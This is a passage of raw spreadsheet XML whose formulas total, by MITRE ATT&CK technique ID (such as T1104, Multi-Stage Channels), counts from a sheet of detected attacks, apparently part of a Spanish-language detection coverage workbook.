  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B24)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E24" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F24" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G24" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>3</v>
      </c>
      <c r="H24" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>3</v>
      </c>
      <c r="I24" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (3)</v>
      </c>
      <c r="J24" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M24" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>3</v>
      </c>
      <c r="N24" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>3</v>
      </c>
      <c r="O24" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P24" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S24" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>6</v>
      </c>
      <c r="T24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U24" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>17</v>
      </c>
      <c r="Z24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>4</v>
      </c>
      <c r="AA24" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (17)</v>
      </c>
      <c r="AB24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC24" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>8</v>
      </c>
      <c r="AF24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>6</v>
      </c>
      <c r="AG24" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (8)</v>
      </c>
      <c r="AH24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI24" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>25</v>
      </c>
      <c r="AL24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>10</v>
      </c>
      <c r="AM24" s="322" t="str">
        <f t="shared" si="5"/>
        <v>10 (25)</v>
      </c>
      <c r="AN24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>9</v>
      </c>
      <c r="AO24" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ24" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR24" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS24" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT24" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY24" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ24" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA24" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC24" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>6</v>
      </c>
      <c r="BD24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>6</v>
      </c>
      <c r="BE24" s="4" t="str">
        <f t="shared" si="8"/>
        <v>6 (6)</v>
      </c>
      <c r="BF24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI24" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>4</v>
      </c>
      <c r="BJ24" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK24" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL24" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>3</v>
      </c>
      <c r="BM24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO24" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>6</v>
      </c>
      <c r="BP24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>5</v>
      </c>
      <c r="BQ24" s="4" t="str">
        <f t="shared" si="10"/>
        <v>5 (6)</v>
      </c>
      <c r="BR24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>3</v>
      </c>
      <c r="BS24" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT24" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU24" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B24,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV24" s="292">
        <v>6</v>
      </c>
      <c r="BW24" s="322">
        <v>3</v>
      </c>
      <c r="BX24" s="4" t="str">
        <f t="shared" si="11"/>
        <v>3 (6)</v>
      </c>
      <c r="BY24" s="12">
        <v>3</v>
      </c>
      <c r="BZ24" s="13">
        <v>1</v>
      </c>
      <c r="CA24" s="394">
        <v>2</v>
      </c>
      <c r="CB24" s="288">
        <v>12</v>
      </c>
      <c r="CC24" s="4">
        <v>5</v>
      </c>
      <c r="CD24" s="4" t="str">
        <f t="shared" si="12"/>
        <v>5 (12)</v>
      </c>
      <c r="CE24" s="4">
        <v>3</v>
      </c>
      <c r="CF24" s="4">
        <v>2</v>
      </c>
      <c r="CG24" s="13">
        <v>1</v>
      </c>
      <c r="CH24" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="25" spans="1:86" ht="15" customHeight="1">
      <c r="A25" s="4">
        <f t="shared" si="13"/>
        <v>23</v>
      </c>
      <c r="B25" s="4" t="str">
        <f>IFERROR(VLOOKUP(A25,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1104</v>
      </c>
      <c r="C25" s="493" t="str">
        <f>IFERROR(VLOOKUP(B25,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="D25" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B25)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E25" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F25" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G25" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H25" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I25" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J25" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M25" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>3</v>
      </c>
      <c r="N25" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>3</v>
      </c>
      <c r="O25" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P25" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S25" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>3</v>
      </c>
      <c r="T25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U25" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>19</v>
      </c>
      <c r="Z25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1</v>
      </c>
      <c r="AA25" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (19)</v>
      </c>
      <c r="AB25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC25" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>7</v>
      </c>
      <c r="AF25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>5</v>
      </c>
      <c r="AG25" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (7)</v>
      </c>
      <c r="AH25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI25" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>26</v>
      </c>
      <c r="AL25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>6</v>
      </c>
      <c r="AM25" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (26)</v>
      </c>
      <c r="AN25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO25" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ25" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR25" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS25" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT25" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY25" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ25" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA25" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC25" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>3</v>
      </c>
      <c r="BD25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>3</v>
      </c>
      <c r="BE25" s="4" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI25" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ25" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK25" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL25" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO25" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>4</v>
      </c>
      <c r="BP25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ25" s="4" t="str">
        <f t="shared" si="10"/>
        <v>3 (4)</v>
      </c>
      <c r="BR25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS25" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT25" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU25" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B25,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV25" s="292">
        <v>5</v>
      </c>
      <c r="BW25" s="322">
        <v>2</v>
      </c>
      <c r="BX25" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (5)</v>
      </c>
      <c r="BY25" s="12">
        <v>2</v>
      </c>
      <c r="BZ25" s="13">
        <v>1</v>
      </c>
      <c r="CA25" s="394">
        <v>1</v>
      </c>
      <c r="CB25" s="288">
        <v>10</v>
      </c>
      <c r="CC25" s="4">
        <v>3</v>
      </c>
      <c r="CD25" s="4" t="str">
        <f t="shared" si="12"/>
        <v>3 (10)</v>
      </c>
      <c r="CE25" s="4">
        <v>2</v>
      </c>
      <c r="CF25" s="4">
